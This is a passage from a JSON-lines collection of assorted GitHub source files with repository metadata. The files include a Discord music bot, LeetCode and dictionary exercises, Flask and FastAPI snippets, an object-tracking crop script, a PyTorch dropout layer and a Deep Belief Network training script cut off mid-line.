[lst_1,lst_2,lst_3]\n\n return matrix\n\ndef PrintBoard():\n for num in matrix:\n print(num)\n\ndef Input():\n global position\n global marker\n position = input(\"Please enter a number for the borad code:\")\n marker = input(\"Please enter a X or O for the borad:\")\n return position,marker\n \ncreateBoard()\nPrintBoard()\nInput()\n","repo_name":"khemmathat14/TictactocPython","sub_path":"TicTacToc.py","file_name":"TicTacToc.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29886162218","text":"import discord\nimport wavelink\nfrom wavelink import websocket\nfrom discord.ext import commands\n\nfrom Secrect import Secret\n\nclass Music(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n if not hasattr(bot, 'wavelink'):\n self.bot.wavelink = wavelink.Client(bot=self.bot)\n\n self.bot.loop.create_task(self.start_nodes())\n\n async def start_nodes(self):\n await self.bot.wait_until_ready()\n\n # Initiate our nodes. For this example we will use one server.\n # Region should be a discord.py guild.region e.g sydney or us_central (Though this is not technically required)\n await self.bot.wavelink.initiate_node(host='127.0.0.1',\n port=8000,\n rest_uri='http://127.0.0.1:8000',\n password='youshallnotpass',\n identifier='Naruuto',\n region='us_central')\n\n @commands.command()\n async def connect_(self, ctx, *, channel: discord.VoiceChannel = None):\n if not channel:\n try:\n channel = ctx.author.voice.channel\n except AttributeError:\n raise discord.DiscordException('No channel to join. Please either specify a valid channel or join one.')\n\n player = self.bot.wavelink.get_player(ctx.guild.id)\n await ctx.send(f'Connecting to **`{channel.name}`**')\n await player.connect(channel.id)\n\n @commands.command()\n async def play(self, ctx, *, query: str):\n tracks = await self.bot.wavelink.get_tracks(f'ytsearch:{query}')\n\n if not tracks:\n return await ctx.send('Could not find any songs with that query.')\n\n player = self.bot.wavelink.get_player(ctx.guild.id)\n if not player.is_connected:\n await ctx.invoke(self.connect_)\n\n await ctx.send(f'Added {str(tracks[0])} to the queue.')\n await player.play(tracks[0])\n\ndef setup(client):\n client.add_cog(Music(client))\n","repo_name":"Gabriel-bits/Bot_Discord","sub_path":"tests/musi.py","file_name":"musi.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41255909807","text":"# 906. Super Palindromes\n\nclass Solution(object):\n \n # strategy check between sql_l and sq_r\n # 10^9 is the length of the range - still not trivial\n # only look at palindromes in that range - 10^5 nums - since the other half of the number is fixed\n # Finally check if the square is also a palindrome\n \n def superpalindromesInRange(self, L, R):\n L = int(L)\n R = int(R)\n \n count = 0\n \n UPPERLIMIT = 100000\n \n # check all nos between 0 and UPPERLIMIT\n \n for x in range(UPPERLIMIT):\n s = str(x)\n p1 = int(s + s[::-1])\n p2 = int(s if len(s) == 0 else s + s[-2::-1])\n \n n1 = p1 ** 2\n n2 = p2 ** 2\n \n if L <= n1 and n1 <= R:\n if is_palindrome(n1):\n print(n1)\n count += 1\n \n if L <= n2 and n2 <= R:\n if is_palindrome(n2):\n print(n2)\n count += 1\n \n return count\n \n# checks if a number is a palindrome\ndef is_palindrome(n):\n return str(n) == str(n)[::-1]\n \n","repo_name":"MahirJhaveri/CompetitiveProgramming","sub_path":"LeetCode/Problem-906.py","file_name":"Problem-906.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10441093717","text":"def get_data(\n bucket_name='xxx', \n key='yyy.zip'):\n s3 = boto3.client('s3')\n response = s3.get_object(Bucket=bucket_name, Key=key)\n file_content = response['Body'].read()\n zip_file = ZipFile(io.BytesIO(file_content))\n return pd.read_csv(zip_file.open(zip_file.infolist()[0]))\n\n# 提供されたコードは、Amazon S3からZIPファイル内のCSVデータを取得し、それをPandasのデータフレームに読み込むための関数です。以下に関数内の主要なステップと役割を説明します:\n# bucket_name と key パラメーター:\n# bucket_name パラメーターは、データが格納されているAmazon S3バケットの名前を指定します。\n# key パラメーターは、取得したいZIPファイルのS3キー(ファイルのパス)を指定します。\n\n# boto3 クライアントの初期化:\n# boto3 ライブラリを使用して、Amazon S3サービスへの接続を確立します。\n\n# S3オブジェクトの取得:\n# s3.get_object() メソッドを使用して、指定したバケットから指定したキーのオブジェクトを取得します。\n\n# ファイル内容の読み込み:\n# 取得したオブジェクトからZIPファイルの内容をバイト列として読み込みます。\n\n# バイト列をZipファイルに変換:\n# 読み込んだバイト列を io.BytesIO を使用してZipファイルに変換します。\n\n# Zipファイル内のCSVファイルの読み込み:\n# ZipFile クラスを使用して、Zipファイル内のCSVファイルを取得し、それをPandasのデータフレームに読み込みます。\n# zip_file.infolist()[0] はZipファイル内の最初のファイルを指定しています。必要に応じて他のファイルを指定できます。\n\n# データフレームの返却:\n# 読み込んだCSVデータをPandasのデータフレームとして返却します。\n \n# この関数を呼び出すことで、指定したS3バケットから指定したZIPファイル内のCSVデータを取得し、それをデータフレームとして利用できます。データの前処理や分析に使用するのに便利です。\n# ただし、bucket_name と key パラメーターには、実際のS3バケットとファイルのパスを指定する必要があります。\n","repo_name":"ChanhiYasutomi/Code_For_DataAnalysis_For_Python","sub_path":"def get_data.py","file_name":"def get_data.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70503011045","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom src.build import build\n\nfrom src.dbutils import Database\n\napp = Flask(__name__)\ncors = CORS(app)\n\n@app.route('/', methods=['GET'])\ndef home():\n response = jsonify(\"Hello World\")\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n\n\n\nif __name__ == '__main__':\n build(app)\n app.run(host=\"0.0.0.0\", port=8080, debug=True, threaded=True)","repo_name":"lbarto12/python-course-webapp","sub_path":"backend/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12336118022","text":"import warnings\r\nwarnings.simplefilter('ignore', UserWarning)\r\n\r\nimport os\r\nimport cv2\r\nimport torch\r\nimport mmcv\r\nfrom mmtrack.apis import inference_sot, init_model\r\nfrom mim.commands.download import download\r\n\r\nfrom argparse import ArgumentParser\r\nparser = ArgumentParser()\r\nparser.add_argument('--video', type=str, default='video', help='video file name')\r\nparser.add_argument('--skip', type=int, default=1, help='skip')\r\nparser.add_argument('--mergin', type=int, default=0, help='mergin')\r\nargs = parser.parse_args()\r\n\r\nvideo_fname = args.video\r\nsave_fname = os.path.splitext(os.path.basename(video_fname))[0]\r\nskip = args.skip\r\nmergin = args.mergin\r\n\r\ndef tracking():\r\n \r\n os.makedirs(save_fname, exist_ok=True)\r\n\r\n # load model\r\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n os.makedirs('models', exist_ok=True)\r\n checkpoint_name = 'siamese_rpn_r50_20e_lasot'\r\n checkpoint = download(package='mmtrack', configs=[checkpoint_name], dest_root=\"models\")[0]\r\n model = init_model(os.path.join('models', checkpoint_name + '.py'), os.path.join('models', checkpoint), device=device)\r\n\r\n # tracking\r\n frames = mmcv.VideoReader(video_fname)\r\n \r\n h = frames.height\r\n w = frames.width\r\n\r\n source_window = \"draw_rectangle\"\r\n cv2.namedWindow(source_window)\r\n rect = cv2.selectROI(source_window, frames[0], False, False)\r\n # rect:(x1, y1, w, h)\r\n # convert (x1, y1, w, h) to (x1, y1, x2, y2)\r\n rect_convert = (rect[0], rect[1], rect[0]+rect[2], rect[1]+rect[3])\r\n cv2.destroyAllWindows()\r\n\r\n for frame_index, frame in enumerate(frames):\r\n result = inference_sot(model, frame, rect_convert, frame_id=frame_index)\r\n if frame_index % skip == 0:\r\n bbox = result['track_bboxes']\r\n # bbox:(x1, y1, x2, y2)\r\n center_x = int((bbox[0] + bbox[2]) / 2)\r\n center_y = int((bbox[1] + bbox[3]) / 2)\r\n rect_width = bbox[2] - bbox[0]\r\n rect_height = bbox[3] - bbox[1]\r\n square_width = max(rect_width, rect_height)\r\n square_width_half = int(square_width / 2)\r\n\r\n new_x1 = center_x - square_width_half - mergin\r\n new_x2 = center_x + square_width_half + mergin\r\n new_y1 = center_y - square_width_half - mergin\r\n new_y2 = center_y + square_width_half + mergin\r\n\r\n if new_x1 >= 0 and new_x2 <= w and new_y1 >= 0 and new_y2 <= h:\r\n\r\n filename = f'{save_fname}_{frame_index}.png'\r\n trim_image = frame[new_y1:new_y2, new_x1:new_x2, :]\r\n cv2.imwrite(os.path.join(save_fname, filename), trim_image) \r\n\r\nif __name__ == '__main__':\r\n tracking()\r\n \r\n","repo_name":"dai-ichiro/enjoyDiffusers","sub_path":"trim_square.py","file_name":"trim_square.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13859209559","text":"from django.urls import re_path, path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.hello_response),\n path('redirect/', views.http_redirect),\n path('fun1', views.fun1),\n path('render-html/', views.render_html),\n path('render-template/', include([\n path('', views.render_template),\n path('form-handler/', views.form_handler),\n ])),\n path('render-to-response', views.func_render_to_response),\n]\n","repo_name":"zinpy/courses_django","sub_path":"lesson_two_response/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11065687599","text":"import numpy as np\nimport pandas as pd\nfrom itertools import combinations\n\nDTYPES = dict(\n stat=\"O\",\n sample=\"O\",\n value=np.int64,\n barcode=\"O\",\n reads=np.int64,\n score=np.int64,\n)\n\nnucleotides = \"ACGTN\"\n\n\ndef isTransition(pair_set):\n return pair_set == {\"A\", \"G\"} or pair_set == {\"C\", \"T\"}\n\n\nmutation_categories = {\n pair: \"transition\" if isTransition(set(pair)) else \"transversion\"\n for pair in combinations(nucleotides[:-1], 2)\n}\n\n_extra_categories = {\"N\": \"read mismatch\", \"Ins\": \"Insertion\", \"Del\": \"Deletion\"}\n\nmutation_categories.update(\n {\n (nucleotide, annotation): mut_category\n for annotation, mut_category in _extra_categories.items()\n for nucleotide in nucleotides\n }\n)\n\nmutation_categories.update(\n {(pair[1], pair[0]): category for pair, category in mutation_categories.items()} #\n) # Make Symmetric\nmutation_categories = pd.Series(mutation_categories, name=\"category\")\nmutation_categories.index.names = [\"From\", \"To\"]\n\nmutation_categories = mutation_categories.loc[\n list(nucleotides) + [\"Ins\"], list(nucleotides) + [\"Del\"]\n]\n\n\ndef barcode_content(barcodes):\n return pd.concat(\n {nuc: barcodes.str.count(nuc) for nuc in nucleotides}, names=[\"content\"], axis=1\n )\n\n\ndef delta_content_constructor(row):\n change = {nuc: 0 for nuc in nucleotides}\n if row[\"From\"] != \"Ins\":\n change[row[\"From\"]] = -1\n if row[\"To\"] != \"Del\":\n change[row[\"To\"]] = +1\n return pd.Series(change)\n\n\ndelta_content_map = mutation_categories.reset_index().apply(\n delta_content_constructor, axis=1\n)\ndelta_content_map.index = mutation_categories.index\n\n\ndef annotate_mutations(barcodes):\n from_barcodes = barcodes[\"From\"]\n to_barcodes = barcodes[\"To\"]\n d_content = barcode_content(to_barcodes) - barcode_content(from_barcodes)\n annotations = pd.DataFrame(\n dict(From=d_content.idxmin(axis=1), To=d_content.idxmax(axis=1))\n )\n d_nucleotides = d_content.sum(axis=1)\n insertions = d_nucleotides == +1\n deletions = d_nucleotides == -1\n annotations.loc[insertions, \"From\"] = \"Ins\"\n annotations.loc[deletions, \"To\"] = \"Del\"\n return annotations\n","repo_name":"cancerevo/AmpliconPE","sub_path":"src/AmpliconPE/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14421101957","text":"\"\"\"\n This is the solution of a student from last quarter named Mark O'Grady.\n This program merges N dictionaries into a single dictionary. If a given\n key exists in more than one of the original dictionaries, that key appears\n once in the merged dictionary and is mapped to a list containing ALL values\n that correspond it from the original dictionaries.\n\"\"\"\n\n# original dictionaries\naddressBook = {'mary':'123 Main St.', 'devon':'3429 Cypress Dr.', 'erin':'9231 Sycamore Pl.', 'paul':'1332 Columbine Dr.', 'john':'4547 Reyes Dr.'}\ncityState = {'john':'Palo Alto, CA'}\ncounty = {}\nphoneBook = {'erin':'(408) 250-4501', 'eric':'(886) 792-3847', 'devon':'(409) 345-1919', 'mary':'(972) 345-2239', 'john':'(650) 982-8732'}\nemail = {'mary':'mary.meyer@yopmail.com', 'david':'davidm@yopmail.com', 'john':'jsmith@maildrop.cc'}\n\n# merged dictionary\ndb = addressBook # start with the first dictionary in the merged set\n\n# populate database\nfor dict in (cityState, county, phoneBook, email):\n for key, value in dict.items ():\n if key not in db: # if key not in db, insert key/vakue into db.\n db [key] = value\n elif type(db[key]) is not list: # if key exists and value not list, create list with existing value and new value.\n db [key] = ([db[key], value])\n else: # key exists and value is already a list, so append to the entry db.\n db [key].append(value)\n\nif __name__ == \"__main__\":\n print ('============================== TESTING SECTION ==============================')\n\n print ('Display Orignal Dictionaries:\\n')\n print ('addressBook = %s' % addressBook)\n print ('cityState = %s' % cityState)\n print ('county = %s' % county)\n print ('phoneBook = %s' % phoneBook)\n print ('email = %s' % email)\n\n\n print ('\\n\\n\\nDisplay New Merged Dictionary (db): \\n')\n print ('db = %s' % db)\n\n\n\n\n","repo_name":"tmcmilla/fhpython101","sub_path":"Examples/dictionaryMerge.py","file_name":"dictionaryMerge.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1196276480","text":"from fastapi import APIRouter, Depends, HTTPException, Response, status\nfrom .. import schemas, database, models, oauth2\nfrom sqlalchemy.orm import Session\n\n\nrouter = APIRouter(prefix=\"/vote\", tags=[\"Vote\"])\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def vote(\n vote: schemas.Vote,\n db: Session = Depends(database.get_db),\n current_user: schemas.UserOut = Depends(oauth2.get_current_user),\n):\n print(vote)\n # print(current_user)\n post = db.query(models.Post).filter(models.Post.id == vote.post_id).first()\n # print(post)\n # print(vote)\n # print(current_user)\n\n if not post:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"post with id {vote.post_id} not found\",\n )\n\n vote_query = db.query(models.Vote).filter(\n models.Vote.post_id == vote.post_id, models.Vote.user_id == current_user.id\n )\n\n found_vote = vote_query.first()\n\n if vote.dir == 1:\n if found_vote:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=f\"vote already exists\"\n )\n new_vote = models.Vote(user_id=current_user.id, post_id=vote.post_id)\n db.add(new_vote)\n db.commit()\n\n return {\"detail\": \"vote created\"}\n else:\n if not found_vote:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=f\"vote not found\"\n )\n db.delete(found_vote)\n db.commit()\n return {\"detail\": \"vote deleted\"}\n","repo_name":"GaikwadSandesh/fastapi_tutorial","sub_path":"app/routers/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5228226196","text":"# x = 10 + 4 * 4 / 2\n# print(x)\n\n# strings_ = [str(x) for x in input(\"Please input at least 5 words (Use Space): \").split()]\n#\n# for index,item in enumerate(strings_):\n#\n# def recursion_reverse(string_1):\n# if not string_1:\n# return \"\"\n# else:\n# front_part=recursion_reverse(string_1[1:])\n# back_part=string_1[0]\n#\n#\n#\n# return front_part+back_part[0]\n#\n# strings_[index]=recursion_reverse(item)\n#\n# print(strings_)\n\ndef display_data(data):\n for result in data:\n count = ''\n while result > 0:\n count += '*'\n result -= 1\n print(count)\ndisplay_data([2,3,4,3])\n","repo_name":"WaiLynnHtut/Code-Test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20381020411","text":"#!/usr/bin/env python\n\nimport asyncio\nimport json\nimport logging\nimport websockets\n\nlogging.basicConfig()\n\nSTATE = {\"value\": 0}\n\n# Contains each room name as a key + the appertaining\n# sessions as a value\nROOMS = {\n}\n\n# Contains a mapping from session ==> user\nUSER_SESSIONS = {\n}\n\n# Contains the session as a key and the room name as a value\nSESSION_ROOMS = {}\n\ndef state_event():\n return json.dumps({\"type\": \"state\", **STATE})\n\ndef message_event(message, user_name):\n return json.dumps({\"type\": 3, \"message\": message, \"from\": user_name})\n\ndef users_event(room_name):\n return json.dumps({\"type\": 2, \"users\": [USER_SESSIONS[session] for session in ROOMS[room_name]]})\n\ndef available_rooms_event():\n return json.dumps({\"type\": 1, \"rooms\": [key for key in ROOMS.keys()]})\n\ndef add_user_to_room(user_name, room_name, session):\n if room_name in ROOMS:\n # Add new session to room\n ROOMS[room_name].add(session)\n # Add mapping between session and room\n SESSION_ROOMS[session] = room_name\n # Add mapping between session and username\n USER_SESSIONS[session] = user_name\n\ndef remove_user(session):\n room = SESSION_ROOMS[session]\n # Remove session from room\n ROOMS[room].remove(session)\n # Remove mapping between session and name\n del USER_SESSIONS[session]\n # Remove mapping between session and room\n del SESSION_ROOMS[session]\n return room\n\ndef send_message_to_room(room_name, message):\n print(\"Sending message '\" + message + \"' to room \" + room_name)\n websockets.broadcast(ROOMS[room_name], message)\n\nasync def handler(websocket, path):\n try:\n # at first, we add each user to the default room\n await websocket.send(available_rooms_event())\n # Manage state changes\n async for message in websocket:\n data = json.loads(message)\n # User Join message\n if data[\"type\"] == 1:\n payload = data[\"data\"]\n user_name = payload[\"userName\"]\n room_name = payload[\"roomName\"]\n\n # room wasn't present --> create + send update\n if not room_name in ROOMS:\n # create new room\n ROOMS[room_name] = set()\n await websocket.send(available_rooms_event())\n\n # Add new user to room\n add_user_to_room(user_name, room_name, websocket)\n send_message_to_room(room_name, users_event(room_name)) # Broadcast join in this room\n pass\n elif data[\"type\"] == 2:\n payload = data[\"data\"]\n message = payload[\"message\"]\n send_message_to_room(SESSION_ROOMS[websocket], message_event(message, USER_SESSIONS[websocket]))\n pass\n finally:\n # Unregister user\n room_name = remove_user(websocket)\n send_message_to_room(room_name, users_event(room_name)) # Broadcast join in this room\n\n\nasync def main():\n async with websockets.serve(handler, \"0.0.0.0\", 6789):\n await asyncio.Future() # run forever\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"elitru/NVSV-Python-Chat","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72103740324","text":"import torch\nfrom torch.autograd.function import InplaceFunction\nfrom itertools import repeat\nimport numpy as np\nfrom collections import Counter\n\n\ndef count_top_K_grid(arr, K=3):\n c = Counter(arr)\n c_sort = sorted(c.items(), key=lambda x:x[1])\n top_K_grid = [c_sort[-i][0] for i in range(1, K+1)]\n return top_K_grid\n\n\ndef replace_arr_by_count(arr, M=10):\n c = Counter(arr)\n aux_c = np.zeros(M)\n aux_c[list(c.keys())] = list(c.values())\n arr_r = aux_c[arr]\n return arr_r\n\n\nclass Parallel_Dropout(InplaceFunction):\n \n @staticmethod\n def _make_noise(con_fc):\n return con_fc.new().resize_as_(con_fc)\n\n @classmethod\n def forward(cls, ctx, con_fc, K=3, M=10, alpha=0.9, beta=0.1, train=False, inplace=False):\n ctx.train = train\n ctx.inplace = inplace\n \n if not ctx.train:\n return con_fc\n\n if ctx.inplace:\n ctx.mark_dirty(con_fc)\n output = con_fc\n else: \n output = con_fc.clone()\n\n con_fc = con_fc.detach().cpu().numpy()\n \n max_con = np.max(con_fc, axis=1, keepdims=True)\n min_con = np.min(con_fc, axis=1, keepdims=True)\n\n con_feat_dif = np.floor((con_fc - min_con) * M / (max_con - min_con)).astype(int)\n con_feat_dif[con_feat_dif==M] = M -1\n top_K_inx = np.apply_along_axis(count_top_K_grid, 1, con_feat_dif)\n \n feat_dif_list = np.split(con_feat_dif, K, axis=1)\n\n fc_sample_pb = []\n \n for i in range(K):\n \n fc_i_feat_dif = feat_dif_list[i]\n fc_i_p_mask = fc_i_feat_dif == top_K_inx[:,i].reshape(-1,1)\n fc_i_non_mask = fc_i_feat_dif != top_K_inx[:,i].reshape(-1,1)\n\n fc_i_r = np.apply_along_axis(replace_arr_by_count, 1, fc_i_feat_dif)\n fc_i_p = beta * (1 - (fc_i_r / fc_i_r.shape[1])) * fc_i_non_mask\n fc_i_p[fc_i_p_mask] = alpha\n\n fc_i_sample_pb = torch.FloatTensor(np.random.binomial(1, fc_i_p, fc_i_p.shape))\n fc_sample_pb.append(fc_i_sample_pb)\n\n ctx.noise = torch.cat(fc_sample_pb, dim=1).cuda()\n output.mul_(ctx.noise)\n\n return output\n\n\n @staticmethod\n def backward(ctx, grad_output):\n if ctx.train:\n return grad_output * ctx.noise, None, None, None, None, None, None, None\n else:\n return grad_output, None, None, None, None, None, None, None\n\n\n\n\n\n\n\n \n","repo_name":"ALIS-Lab/AAAI2021-PDD","sub_path":"networks/parallel_dropout.py","file_name":"parallel_dropout.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"40367741754","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom SBW import LED\nfrom SBW import Conditions\nfrom Klavesnice import Klavesnice\n#from Teplomer import Teplomer\nfrom Klavesnice2 import AutomatickaKlavesnice\nfrom Bzucak import Noise\nfrom RGB import RGBLED\n\nGPIO.setmode(GPIO.BCM)\n\nclass Hlavni_kod():\n\n def __init__(self):\n self.led = LED()\n self.podminky = Conditions()\n self.noise = Noise()\n self.klavesnice = Klavesnice()\n# self.teplomer = Teplomer()\n self.automatickaKlavesnice = AutomatickaKlavesnice()\n self.rgb = RGBLED()\n\n def vyberProgramu(self):\n textMenu = \"\"\"Vítejte v menu:\\n \n 1) Teploměr - ODPOJENO\n 2) Blikni\n 3) Bzučák\n 4) Volný průjezd\\n\n 5) Exit\\n\"\"\"\n\n coChceme = int((input(textMenu)))\n\n if coChceme == 1:\n pass\n# self.teplomer.read_temp_print()\n elif coChceme == 2:\n self.podminky.blickniBG()\n elif coChceme == 3:\n vlozeneCislo = int(input(\"Prosím vložce počet opakování: \"))\n self.noise.bzucakOpakovani(vlozeneCislo)\n elif coChceme == 4:\n self.rgb.bilaRGB_BLICK()\n\n # ------ EXIT -----\n elif coChceme == 5:\n GPIO.cleanup()\n exit()\n else:\n print(\"Prosím vyberte z menu\")\n\nwhile True:\n try:\n program = Hlavni_kod()\n program.vyberProgramu()\n\n except KeyboardInterrupt:\n GPIO.cleanup()","repo_name":"PetrPatera/Raspberry","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74855671525","text":"from sys import platform\n\nif platform == \"linux\" or platform == \"linux2\":\n # linux\n pass\nelif platform == \"darwin\":\n # OS X\n import caffeine\nelif platform == \"win32\":\n # Windows...\n pass\n\nimport os, timeit, traceback\nimport numpy as np\n\nimport data\nimport utils\nfrom models.dbn import DBN\n\n__docformat__ = 'restructedtext en'\n\n__doc__ = \"\"\"\nThis code trains a Deep Belief Network on the weather data\n\nData Set:\n - 582 events\n - 10092 features\n - binary result of TRUE|FALSE\n\nThe features are unknown preprocessed weather data and the result corresponds to an ice-storm event\n\"\"\"\n\n# Save locations\n## built model\nMODEL = data.model_dir\nMODEL_ID = os.path.splitext(os.path.basename(__file__))[0]\n\n## visualising runtime parameters\nDATA_DIR = data.data_dir\nPLOT_DIR = data.plot_dir\n\n# remove existing files\nos.system('rm {}_*'.format(os.path.join(DATA_DIR, '', MODEL_ID)))\n\n# network parameters\nn_ins = 10092\nhidden_layer_sizes = [5000, 2500, 1000]\nn_outs = 2\n\n# pre-training\nk = 15 # number of Gibbs steps in CD/PCD\npretraining_epochs = 100\npretrain_lr = 0.01\n\n# training (fine-tuning)\nfinetune_lr = 0.1\ntraining_epochs = 1000\nbatch_size = 10\n\n# early-stopping parameters\npatience = 20000 # look as this many examples regardless\npatience_increase = 2 # wait this much longer if new best found\nimprovement_threshold = 0.995 # consider this improvement significant\npretrain_vis_freq = False\nfinetrain_vis_freq = False\n\nif __name__ == '__main__':\n \n logger = utils.logs.get_logger(__name__,\n update_stream_level=utils.logs.logging.DEBUG)\n logger.info('Loading data ...')\n source = data.Load_Data(location=data.data_loc)\n \n datasets = source.all()\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n \n # compute number of minibatches for training, validation and testing\n n_train_batches = train_set_x.get_value(borrow=True).shape[0]// batch_size\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]// batch_size\n n_test_batches = test_set_x.get_value(borrow=True).shape[0] // batch_size\n \n # np random generator\n np_rng = np.random.RandomState(123)\n \n logger.info('Building the model ...')\n # construct the Deep Belief Network\n dbn = DBN(\n np_rng=np_rng,\n n_ins=n_ins,\n hidden_layers_sizes=hidden_layer_sizes,\n n_outs=n_outs\n )\n \n logger.debug('building pre-training functions')\n pretraining_fns = dbn.pretrainingFunctions(train_set_x=train_set_x,\n batch_size=batch_size,\n k=k)\n \n # visualise arbitrary parameters at runtime\n visualise_params = {}\n \n # visualise cost during runtime\n visualise_cost = { # visualising the cost\n 'cost':{'freq':pretrain_vis_freq} # frequency of sampling\n }\n \n # Visualise these items during training\n visualise_weights = {\n 'inputLayer' + '_weights': {\n 'x':dbn.sigmoid_layers[0].w,\n 'img_shape':(29*2, 29*2*3),\n 'tile_shape':(25, 40),\n 'tile_spacing':(1, 1),\n 'freq':pretrain_vis_freq,\n 'runtime_plots':True\n }\n }\n \n param_man = utils.visualise.Visualise_Runtime(\n plot_dir=PLOT_DIR,\n data_dir=DATA_DIR\n )\n param_man.initalise(\n run_id = MODEL_ID,\n imgs = visualise_weights,\n default_freq = n_train_batches//2,\n cost = visualise_cost\n )\n \n logger.info('Pre-training the model ...')\n start_time = timeit.default_timer()\n \n param_man.getValues(\n i = -1, # -1 because print at (i+1) % freq\n cost = np.nan,\n # fill with np.nan for each update that is expected\n updates = [np.nan]*len(param_man.updates.keys()))\n param_man.writeRuntimeValues(i = -1, clean_files = True)\n \n for l in range(dbn.n_layers): # Pre-train layer-wise\n # Allows a bored person to quit the run\n # without losing everything!\n try: # control+c doesn't loose everything!\n logger.debug('Pre-training layer: {}'.format(l))\n layer_start = timeit.default_timer()\n \n # this particular section pull parameters from the RBM\n # as the RBM is used for pretraining the Hidden Layers\n new_params = {\n 'hiddenLayerRBM{:02d}'.format(l) + '_weights': {\n 'x': dbn.rbm_layers[l].w,\n 'freq':pretrain_vis_freq,\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_hbias': {\n 'x': dbn.rbm_layers[l].hbias,\n 'freq':pretrain_vis_freq,\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_vbias': {\n 'x': dbn.rbm_layers[l].vbias,\n 'freq':pretrain_vis_freq,\n }\n }\n \n # the update_position is fixed because we delete \n # the current dict at end of loop\n visualise_updates = {\n 'hiddenLayerRBM{:02d}'.format(l) + '_weights': {\n 'update_position':0,\n 'freq':pretrain_vis_freq\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_hbias': {\n 'update_position':1,\n 'freq':pretrain_vis_freq\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_vbias': {\n 'update_position':2,\n 'freq':pretrain_vis_freq\n }\n }\n \n param_man.initalise(\n run_id = MODEL_ID,\n default_freq = n_train_batches//2,\n params = new_params,\n updates = visualise_updates,\n cost = visualise_cost\n )\n \n # go through pretraining epochs 0th epoch is before start\n for epoch in range(1, pretraining_epochs+1):\n epoch_start = timeit.default_timer()\n # go through the training set\n costs = []\n for minibatch_index in range(n_train_batches):\n result = pretraining_fns[l](\n index=minibatch_index,\n lr=pretrain_lr\n )\n \n if type(result) == list:\n # accomodates return of gparams in result\n c = result.pop(0)\n costs.append(c)\n updates = [(g*pretrain_lr).mean() for g in result]\n else:\n # no gparams in result\n c = result\n costs.append(c)\n updates = None\n \n i = (epoch - 1) * n_train_batches + minibatch_index\n \n param_man.getValues(\n i = i,\n cost = np.mean(costs),\n updates = updates\n )\n param_man.writeRuntimeValues(i = i)\n \n av_cost = np.mean(costs)\n epoch_end = timeit.default_timer()\n epoch_time = epoch_end - epoch_start\n logger.debug('Pre-training layer: {}, epoch {}, cost {},'\n ' time {}s'.format(l, epoch, av_cost, epoch_time))\n \n # these sections handle errors nicely\n except KeyboardInterrupt:\n logger.warn('Manual Exit!')\n logger.warn('Moving to clean-up ...')\n except:\n logger.error('Unplanned Exit!')\n for line in traceback.format_exc().split(\"\\n\"):\n logger.error(line)\n \n layer_end = timeit.default_timer()\n layer_time = layer_end - layer_start\n logger.info('done pre-training layer: {}. Time: {} mins'.format(\n l, layer_time/60.))\n \n if param_man.imgs: # only want images from first layer\n param_man.imgs = {}\n del param_man.cost['cost']\n del param_man.params['hiddenLayerRBM{:02d}'.format(l) + '_weights']\n del param_man.params['hiddenLayerRBM{:02d}'.format(l) + '_hbias']\n del param_man.params['hiddenLayerRBM{:02d}'.format(l) + '_vbias']\n del param_man.updates['hiddenLayerRBM{:02d}'.format(l) + '_weights']\n del param_man.updates['hiddenLayerRBM{:02d}'.format(l) + '_hbias']\n del 